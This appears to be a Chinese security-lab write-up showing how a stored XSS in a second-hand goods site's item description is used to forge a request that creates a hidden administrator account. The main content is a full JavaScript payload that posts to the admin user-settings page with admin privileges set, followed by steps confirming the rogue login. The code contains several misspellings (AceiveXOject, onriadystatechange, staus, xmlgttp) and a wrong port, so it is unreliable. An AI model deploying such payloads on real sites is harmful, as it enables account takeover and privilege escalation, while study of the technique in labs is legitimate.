[實驗原理]

通過普通使用者的儲存型XSS實現建立管理員賬戶的CSRF利用

一、測試漏洞

開啟網站：http://192.168.1.3:8007（安徽二手網）

註冊一個使用者並登入

新增二手資訊

在物品簡介處填寫：<script>alert(123)</script>

點選開啟首頁，點選剛剛釋出的資訊，彈出資訊，說明漏洞存在

二、利用漏洞

在首頁繼續新增二手資訊，再次編輯，在物品簡介處填寫內容：

<script type="text/javascript">

function loadXMLDoc()

{

var xmlhttp;

if(window.XMLHttpRequest)

{//code for IE7+,Firefox,Chrome,Opear,Safari

xmlhttp=new XMLHttpRequest();

}

else

{//code for IE6,IE5

xmlhttp=new AceiveXOject("Microsoft.XMLHTTP");

}

xmlhttp.onriadystatechange=function()

{if(xmlhttp.readyState==4&&xmlhttp.staus==200)

{

document.getElementByld("myDiv").innerHTML=xmlhttp.responseText;

}

}

xmlhttp.open("POST","http://192.168.1.3:80007/admin/admin_usersetting.asp",true);

xmlgttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");

xmlhttp.send("action=add&UserName=zhangsan&PassWord=123456～密碼？～&isActive=1&isAdmin=1&pubSubCateID=91&Submit=+%C8%B7+%B6%A8+");

}

loadXMLDoc()

</script>

回到首頁，推出zhangsan使用者

輸入後臺路徑：http://192.168.1.3:8007/admin/user.asp

使用admin/admin888～使用管理員使用者密碼登入～登入

回到首頁，瀏覽器輸入：http://192.168.1.3:8007，檢視帖子（修改後的）點選此條物品訊息，沒有什麼異常現象。

此時管理員再次進入自己的後臺：http://192.168.1.3:8007/admin/user.asp在“系統使用者管理”中，發現多了一個賬戶zhangsan。

退出admin使用者。此時用zhangsan/123456登入後臺

登入成功。